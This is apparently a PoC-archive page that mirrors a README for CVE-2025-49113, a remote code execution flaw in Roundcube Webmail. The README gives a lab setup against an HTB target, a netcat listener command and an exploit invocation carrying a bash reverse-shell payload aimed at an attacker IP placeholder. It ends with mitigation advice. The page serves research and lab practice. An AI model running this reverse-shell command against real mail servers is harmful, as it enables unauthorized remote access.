Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2025-49113 PoC — Roundcube Webmail 安全漏洞

Source
Associated Vulnerability
Title: Roundcube Webmail 安全漏洞 (CVE-2025-49113)
Description:Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
Readme
# CVE-2025-49113 – Roundcube 1.6.10 Authenticated Remote Code Execution

> ⚠️ **Disclaimer**  
This repository is intended strictly for educational and research purposes.  
All demonstrations were performed in a controlled lab environment.  
Unauthorized testing or exploitation of systems without explicit permission is illegal and unethical. The author is not responsible for any misuse of this information.

---

## 📌 What Is Roundcube?

**Roundcube** is a widely used, browser-based IMAP email client written in PHP. It provides a user-friendly interface for webmail access and is commonly deployed by hosting providers, academic institutions, and internal enterprise mail servers.

---

## 🚨 About the Vulnerability

**CVE-2025-49113** is a vulnerability affecting **Roundcube version 1.6.10** that allows an **authenticated user** to achieve **remote code execution** (RCE) by submitting a crafted command through the webmail interface.

Successful exploitation requires valid user credentials. Once exploited, it grants system-level command execution based on the web server's context.

- **CVE ID**: CVE-2025-49113  
- **Affected Application**: Roundcube 1.6.10  
- **Vulnerability Type**: Authenticated Remote Code Execution  
- **Exploit Type**: Reverse Shell via PHP Payload  
- **Exploit Availability**: [Public GitHub PoC](https://github.com/hakaioffsec/CVE-2025-49113-exploit)

---

## ⚙️ Lab Setup

- **Target URL**: `http://mail.outbound.htb`  
- **Roundcube Version**: 1.6.10  
- **Listener**: Netcat on port `4444`  
- **Exploit**: `CVE-2025-49113.php`

---

## 🚀 Exploit Usage

### 1. Start Netcat Listener

```bash
nc -nlvp 4444
```

### 2. Run the Exploit

```bash
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"
```

> 🔧 Replace `<YOUR-IP>` with your attacker's IP.

---

## 📸 Demonstration

### Exploit Script Output

![Exploit Script Running](./img/roundcube.png)

### Reverse Shell Captured

![Reverse Shell Listener](./img/reverse_shell.png)

---

## 🔐 Mitigation

- Upgrade Roundcube to the latest stable and secure release.
- Remove or restrict user access to vulnerable components.
- Enforce strong access controls and IP whitelisting for webmail interfaces.
- Monitor authentication logs for anomalies.
- Apply least privilege principles on web server environments.

---

## 📝 Notes

- Exploit requires authentication.
- Only tested against Roundcube 1.6.10.
- The user context of the shell depends on the server configuration.
- Demonstration conducted in a virtual lab environment.

---

## 📚 References

- [OffSec Blog Post](https://www.offsec.com/blog/cve-2025-49113/)  
- [Public Exploit](https://github.com/hakaioffsec/CVE-2025-49113-exploit)  

---

## 📝 Medium Blog

Check out the detailed walkthrough and theory on my Medium post:  
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/cve-2025-49113-roundcube-1-6-10-remote-code-execution-0598e7944361?sk=b0023c78b7f0d8de5e683f4d2316967d)**
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →